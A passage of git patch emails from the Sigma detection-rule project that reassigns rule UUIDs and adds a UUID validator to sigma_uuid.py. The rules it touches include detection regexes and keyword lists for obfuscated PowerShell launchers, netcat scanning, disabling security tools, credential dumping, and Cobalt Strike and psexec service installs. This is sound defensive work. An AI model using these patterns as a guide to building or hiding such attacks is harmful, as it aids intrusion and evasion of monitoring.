eventName: AssumeRole + userIdentity.type: AssumedRole userIdentity.sessionContext.sessionIssuer.type: Role condition: selection level: low From 086a15fc4504ccb527e7f4a28ec05955ba019408 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 20:07:03 +0200 Subject: [PATCH 0708/1367] Update global ID --- rules/compliance/cleartext_protocols.yml | 3 +- ...itd_cve_2021_3156_sudo_buffer_overflow.yml | 3 +- rules/linux/lnx_network_service_scanning.yml | 3 +- rules/linux/lnx_security_tools_disabling.yml | 3 +- rules/linux/lnx_sudo_cve_2019_14287.yml | 3 +- rules/linux/lnx_system_info_discovery.yml | 3 +- rules/network/net_high_dns_bytes_out.yml | 3 +- rules/network/net_high_dns_requests_rate.yml | 3 +- rules/network/net_susp_network_scan.yml | 3 +- rules/windows/builtin/win_apt_apt29_tor.yml | 1 + .../win_cobaltstrike_service_installs.yml | 3 +- .../win_invoke_obfuscation_clip+_services.yml | 4 ++- ...ke_obfuscation_obfuscated_iex_services.yml | 4 ++- ...win_invoke_obfuscation_stdin+_services.yml | 4 ++- .../sysmon_wmiprvse_wbemcomn_dll_hijack.yml | 3 +- tools/sigma/sigma_uuid.py | 30 ++++++++++++++++--- 16 files changed, 58 insertions(+), 18 deletions(-) diff --git a/rules/compliance/cleartext_protocols.yml b/rules/compliance/cleartext_protocols.yml index 40905d70..e50e0ea2 100644 --- a/rules/compliance/cleartext_protocols.yml +++ b/rules/compliance/cleartext_protocols.yml @@ -1,6 +1,5 @@ action: global title: Cleartext Protocol Usage -id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f status: stable description: Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. @@ -57,6 +56,7 @@ level: low # - PCI DSS 3.2 7.2 # - PCI DSS 3.2 7.3 --- +id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f logsource: product: netflow detection: @@ -80,6 +80,7 @@ detection: - 5904 condition: selection --- +id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e logsource: category: firewall detection: diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index da9e53df..737df5c2 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -1,6 +1,5 @@ action: global title: CVE-2021-3156 Exploitation Attempt -id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f status: experimental description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | Alternative approach might be to look for flooding of auditd logs due to bruteforcing | @@ -21,6 +20,7 @@ logsource: product: linux service: auditd --- +id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f detection: selection: type: 'EXECVE' @@ -43,6 +43,7 @@ detection: a4: '\' condition: selection and (cmd1 or cmd2 or cmd3 or cmd4) and (cmd5 or cmd6 or cmd7 or cmd8) | count() by host > 50 --- +id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2 detection: selection: type: 'SYSCALL' diff --git a/rules/linux/lnx_network_service_scanning.yml b/rules/linux/lnx_network_service_scanning.yml index 831c1dac..ce6d798d 100644 --- a/rules/linux/lnx_network_service_scanning.yml +++ b/rules/linux/lnx_network_service_scanning.yml @@ -1,6 +1,5 @@ action: global title: Linux Network Service Scanning -id: 3e102cd9-a70d-4a7a-9508-403963092f31 status: experimental description: Detects enumeration of local or remote network services. author: Alejandro Ortuno, oscd.community @@ -14,6 +13,7 @@ tags: - attack.discovery - attack.t1046 --- +id: 3e102cd9-a70d-4a7a-9508-403963092f31 logsource: category: process_creation product: linux @@ -31,6 +31,7 @@ detection: CommandLine|contains: 'l' condition: (netcat and not netcat_listen_flag) or network_scanning_tools --- +id: 3761e026-f259-44e6-8826-719ed8079408 logsource: product: linux service: auditd diff --git a/rules/linux/lnx_security_tools_disabling.yml b/rules/linux/lnx_security_tools_disabling.yml index 2fee4c8e..a51eade7 100644 --- a/rules/linux/lnx_security_tools_disabling.yml +++ b/rules/linux/lnx_security_tools_disabling.yml @@ -1,6 +1,5 @@ action: global title: Disabling Security Tools -id: e3a8a052-111f-4606-9aee-f28ebeb76776 status: experimental description: Detects disabling security tools author: Ömer Günal, Alejandro Ortuno, oscd.community @@ -15,6 +14,7 @@ tags: - attack.t1562.004 - attack.t1089 # an old one --- +id: e3a8a052-111f-4606-9aee-f28ebeb76776 logsource: category: process_creation product: linux @@ -84,6 +84,7 @@ detection: - 'falcon-sensor' condition: 1 of them --- +id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 logsource: product: linux service: syslog diff --git a/rules/linux/lnx_sudo_cve_2019_14287.yml b/rules/linux/lnx_sudo_cve_2019_14287.yml index 84ab95b7..426f5934 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287.yml @@ -1,6 +1,5 @@ action: global title: Sudo Privilege Escalation CVE-2019-14287 -id: f74107df-b6c6-4e80-bf00-4170b658162b status: experimental description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 author: Florian Roth @@ -21,11 +20,13 @@ tags: - attack.t1169 # an old one - attack.t1548.003 --- +id: f74107df-b6c6-4e80-bf00-4170b658162b detection: selection_keywords: - '* -u#*' condition: selection_keywords --- +id: 7fcc54cb-f27d-4684-84b7-436af096f858 detection: selection_user: USER: diff --git a/rules/linux/lnx_system_info_discovery.yml b/rules/linux/lnx_system_info_discovery.yml index 892f10d7..f8b68956 100644 --- a/rules/linux/lnx_system_info_discovery.yml +++ b/rules/linux/lnx_system_info_discovery.yml @@ -1,6 +1,5 @@ action: global title: System Information Discovery -id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 status: stable description: Detects system information discovery commands author: Ömer Günal, oscd.community @@ -15,6 +14,7 @@ tags: - attack.discovery - attack.t1082 --- +id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 logsource: product: linux category: process_creation @@ -30,6 +30,7 @@ detection: - '/lsmod' condition: selection --- +id: 1f358e2e-cb63-43c3-b575-dfb072a6814f logsource: product: linux service: auditd diff --git a/rules/network/net_high_dns_bytes_out.yml b/rules/network/net_high_dns_bytes_out.yml index 630a8a71..babf0d21 100644 --- a/rules/network/net_high_dns_bytes_out.yml +++ b/rules/network/net_high_dns_bytes_out.yml @@ -1,6 +1,5 @@ action: global title: High DNS Bytes Out -id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd status: experimental description: High DNS queries bytes amount from host per short period of time author: Daniil Yugoslavskiy, oscd.community @@ -14,6 +13,7 @@ tags: - attack.t1048 # an old one - attack.t1048.003 --- +id: 0f6c1bf5-70a5-4963-aef9-aab1eefb50bd logsource: category: dns detection: @@ -22,6 +22,7 @@ detection: timeframe: 1m condition: selection | sum(question_length) by src_ip > 300000 --- +id: 3b6e327d-8649-4102-993f-d25786481589 logsource: category: firewall detection: diff --git a/rules/network/net_high_dns_requests_rate.yml b/rules/network/net_high_dns_requests_rate.yml index 1e1d8f11..c870aacf 100644 --- a/rules/network/net_high_dns_requests_rate.yml +++ b/rules/network/net_high_dns_requests_rate.yml @@ -1,6 +1,5 @@ action: global title: High DNS Requests Rate -id: b4163085-4001-46a3-a79a-55d8bbbc7a3a status: experimental description: High DNS requests amount from host per short period of time author: Daniil Yugoslavskiy, oscd.community @@ -17,6 +16,7 @@ tags: - attack.t1071 # an old one - attack.t1071.004 --- +id: b4163085-4001-46a3-a79a-55d8bbbc7a3a logsource: category: dns detection: @@ -25,6 +25,7 @@ detection: timeframe: 1m condition: selection | count() by src_ip > 1000 --- +id: 51186749-7415-46be-90e5-6914865c825a logsource: category: firewall detection: diff --git a/rules/network/net_susp_network_scan.yml b/rules/network/net_susp_network_scan.yml index ae8770e6..a4032fda 100644 --- a/rules/network/net_susp_network_scan.yml +++ b/rules/network/net_susp_network_scan.yml @@ -1,6 +1,5 @@ action: global title: Network Scans -id: fab0ddf0-b8a9-4d70-91ce-a20547209afb status: experimental description: Detects many failed connection attempts to different ports or hosts author: Thomas Patzke @@ -21,12 +20,14 @@ tags: - attack.discovery - attack.t1046 --- +id: fab0ddf0-b8a9-4d70-91ce-a20547209afb detection: selection: action: denied timeframe: 24h condition: selection | count(dst_port) by src_ip > 10 --- +id: 4601eaec-6b45-4052-ad32-2d96d26ce0d8 detection: selection: action: denied diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index efd86f6e..8e4e79c8 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -26,6 +26,7 @@ falsepositives: - Unknown level: high --- +id: d1478dc2-fd6a-4154-a8fb-ba9a88a366e5 logsource: category: process_creation product: windows diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index 9f81e307..ca2308ab 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -1,6 +1,5 @@ action: global title: CobaltStrike Service Installations -id: 5a105d34-05fc-401e-8553-272b45c1522d description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement author: Florian Roth, Wojciech Lesicki references: @@ -34,6 +33,7 @@ falsepositives: - Unknown level: critical --- +id: 5a105d34-05fc-401e-8553-272b45c1522d logsource: product: windows service: system @@ -41,6 +41,7 @@ detection: selection_id: EventID: 7045 --- +id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml index 0b502851..6ba0e08f 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation CLIP+ Launcher -id: f7385ee2-0e0c-11eb-adc1-0242ac120002 description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection and selection_eventid --- +id: f7385ee2-0e0c-11eb-adc1-0242ac120002 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3 logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 4edf51e1-cb83-4e1a-bc39-800e396068e3 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml index b76bdade..aa3cec10 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Obfuscated IEX Invocation -id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -22,6 +21,7 @@ detection: - ImagePath|re: '\String\]\s*\$VerbosePreference' condition: selection and selection_1 --- +id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 logsource: product: windows service: system @@ -29,6 +29,7 @@ detection: selection: EventID: 7045 --- +id: e75c48bd-3434-4d61-94b7-ddfaa2c08487 logsource: product: windows category: driver_load @@ -36,6 +37,7 @@ detection: selection: EventID: 6 --- +id: fd0f5778-d3cb-4c9a-9695-66759d04702a logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml index 1345ea6c..0bebb79d 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation STDIN+ Launcher -id: 72862bf2-0eb1-11eb-adc1-0242ac120002 description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection and selection_eventid --- +id: 72862bf2-0eb1-11eb-adc1-0242ac120002 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 logsource: product: windows service: security diff --git a/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml b/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml index b8064b87..8b47fd5a 100644 --- a/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml +++ b/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,6 +1,5 @@ action: global title: Wmiprvse Wbemcomn DLL Hijack -id: 614a7e17-5643-4d89-b6fe-f9df1a79641c description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. status: experimental date: 2020/10/12 @@ -17,6 +16,7 @@ falsepositives: - Unknown level: critical --- +id: 614a7e17-5643-4d89-b6fe-f9df1a79641c logsource: product: windows category: file_event @@ -26,6 +26,7 @@ detection: TargetFilename|endswith: '\wbem\wbemcomn.dll' condition: selection --- +id: 7707a579-e0d8-4886-a853-ce47e4575aaa logsource: product: windows category: image_load diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index 9ec32b71..8875004b 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py @@ -7,6 +7,7 @@ from uuid import uuid4, UUID import yaml from sigma.output import SigmaYAMLDumper + def print_verbose(*arg, **kwarg): print(*arg, **kwarg) @@ -14,6 +15,17 @@ def print_verbose(*arg, **kwarg): def yaml_preserve_order(self, dict_data): return self.represent_mapping("tag:yaml.org,2002:map", dict_data.items()) +def valid_rule(rule,i,path): + try: + UUID(rule["id"]) + except ValueError: # id is not a valid UUID + print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"])) + return False + except KeyError: # rule has no id + print("Rule {} in file {} has no UUID.".format(i, str(path))) + return False + return True + def main(): argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") @@ -37,22 +49,32 @@ def main(): passed = True for path in paths: print_verbose("Rule {}".format(str(path))) - with path.open("r") as f: + with path.open("r",encoding="UTF-8") as f: rules = list(yaml.safe_load_all(f)) - + + nb_rule = len(rules) if args.verify: - i = 1 + if nb_rule == 1: + if not valid_rule(rules[0],1,path): passed = False + else: + if rules[0]["action"] == "global": + for i in range(1,nb_rule): + if not valid_rule(rules[i],i,path): passed = False + ''' for rule in rules: + if "title" in rule: # Rule with a title should also have a UUID try: UUID(rule["id"]) except ValueError: # id is not a valid UUID print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"])) passed = False + exit() except KeyError: # rule has no id print("Rule {} in file {} has no UUID.".format(i, str(path))) passed = False - i += 1 + exit() + ''' else: newrules = list() changed = False From ac90ee0002895133550503ab1baa8b5a5498ac79 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 20:23:23 +0200 Subject: [PATCH 0709/1367] Update global ID --- .../win_invoke_obfuscation_var+_services.yml | 4 +++- ...invoke_obfuscation_via_compress_services.yml | 4 +++- ...n_invoke_obfuscation_via_rundll_services.yml | 4 +++- ...in_invoke_obfuscation_via_stdin_services.yml | 4 +++- ...invoke_obfuscation_via_use_clip_services.yml | 4 +++- ...nvoke_obfuscation_via_use_mshta_services.yml | 4 +++- ...ke_obfuscation_via_use_rundll32_services.yml | 4 +++- ...in_invoke_obfuscation_via_var++_services.yml | 4 +++- rules/windows/builtin/win_mal_creddumper.yml | 5 +++-- .../builtin/win_mal_service_installs.yml | 3 ++- ...t_or_impacket_smb_psexec_service_install.yml | 17 +++++++++-------- ...altstrike_getsystem_service_installation.yml | 4 +++- rules/windows/builtin/win_moriya_rootkit.yml | 3 ++- 13 files changed, 43 insertions(+), 21 deletions(-) diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml index 366fea97..939ff725 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation VAR+ Launcher -id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 description: Detects Obfuscated use of Environment Variables to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: all of them --- +id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 logsource: product: windows service: system @@ -28,10 +28,12 @@ detection: selection_eventid: EventID: 7045 --- +id: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc logsource: product: windows category: process_creation --- +id: dcf2db1f-f091-425b-a821-c05875b8925a logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml index 2ec58024..1b1b490f 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation COMPRESS OBFUSCATION -id: 175997c5-803c-4b08-8bb0-70b099f47595 description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection and selection_eventid --- +id: 175997c5-803c-4b08-8bb0-70b099f47595 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: c70731dd-0097-40ff-b112-f7032f29c16c logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 7a922f1b-2635-4d6c-91ef-af228b198ad3 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml index e6925517..11317dda 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation RUNDLL LAUNCHER -id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection and selection_eventid --- +id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml index 01baa20f..4cc9ee79 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Via Stdin -id: 487c7524-f892-4054-b263-8a0ace63fc25 description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection and selection_eventid --- +id: 487c7524-f892-4054-b263-8a0ace63fc25 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 82b66143-53ee-4369-ab02-de2c70cd6352 logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml index 701415bd..45b5d47b 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Via Use Clip -id: 63e3365d-4824-42d8-8b82-e56810fefa0c description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection and selection_eventid --- +id: 63e3365d-4824-42d8-8b82-e56810fefa0c logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851 logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml index ccdb7759..decfefb6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Via Use MSHTA -id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection and selection_eventid --- +id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: a4e82ad2-7430-4ee8-b858-6ad6099773fa logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml index 4c2297a6..a095343e 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation Via Use Rundll32 -id: 641a4bfb-c017-44f7-800c-2aee0184ce9b description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection and selection_eventid --- +id: 641a4bfb-c017-44f7-800c-2aee0184ce9b logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 4e1518d9-2136-4015-ab49-c31d7c8588e1 logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: cd0f7229-d16f-42de-8fe3-fba365fbcb3a logsource: product: windows service: security diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml index e042bb14..af6859b6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml @@ -1,6 +1,5 @@ action: global title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION -id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community @@ -21,6 +20,7 @@ detection: ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection and selection_eventid --- +id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 logsource: product: windows service: system @@ -28,6 +28,7 @@ detection: selection_eventid: EventID: 7045 --- +id: 7b9a650e-6788-4fdf-888d-ec7c0a62810d logsource: product: windows category: driver_load @@ -35,6 +36,7 @@ detection: selection_eventid: EventID: 6 --- +id: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_mal_creddumper.yml b/rules/windows/builtin/win_mal_creddumper.yml index 6a71474a..76cc287b 100644 --- a/rules/windows/builtin/win_mal_creddumper.yml +++ b/rules/windows/builtin/win_mal_creddumper.yml @@ -1,9 +1,7 @@ ---- action: global title: Credential Dumping Tools Service Execution description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community -id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed date: 2017/03/05 modified: 2021/03/18 references: @@ -44,6 +42,7 @@ falsepositives: - Legitimate Administrator using credential dumping tool for password recovery level: high --- +id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed logsource: product: windows service: system @@ -51,10 +50,12 @@ detection: selection: EventID: 7045 --- +id: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2 logsource: product: windows category: driver_load --- +id: f0d1feba-4344-4ca9-8121-a6c97bd6df52 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_mal_service_installs.yml b/rules/windows/builtin/win_mal_service_installs.yml index cf70185f..e5fcbbab 100644 --- a/rules/windows/builtin/win_mal_service_installs.yml +++ b/rules/windows/builtin/win_mal_service_installs.yml @@ -1,6 +1,5 @@ action: global title: Malicious Service Installations -id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) date: 2017/03/27 @@ -24,6 +23,7 @@ falsepositives: - Penetration testing level: critical --- +id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a logsource: product: windows service: system @@ -39,6 +39,7 @@ detection: malsvc_apt29: ServiceName: 'Java(TM) Virtual Machine Support Service' --- +id: cb062102-587e-4414-8efa-dbe3c7bf19c6 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml b/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml index 888c3dc9..6b61aec6 100644 --- a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml @@ -1,10 +1,9 @@ +action: global title: Metasploit Or Impacket Service Installation Via SMB PsExec -id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation author: Bartlomiej Czyz, Relativity date: 2021/01/21 modified: 2021/07/23 -action: global references: - https://bczyz1.github.io/2021/01/30/psexec.html tags: @@ -32,6 +31,7 @@ falsepositives: - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name level: high --- +id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 logsource: product: windows service: system @@ -39,10 +39,11 @@ detection: selection: EventID: 7045 --- - logsource: - product: windows - service: security - detection: - selection: - EventID: 4697 +id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 diff --git a/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index 7e118373..0bd04b69 100644 --- a/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml +++ 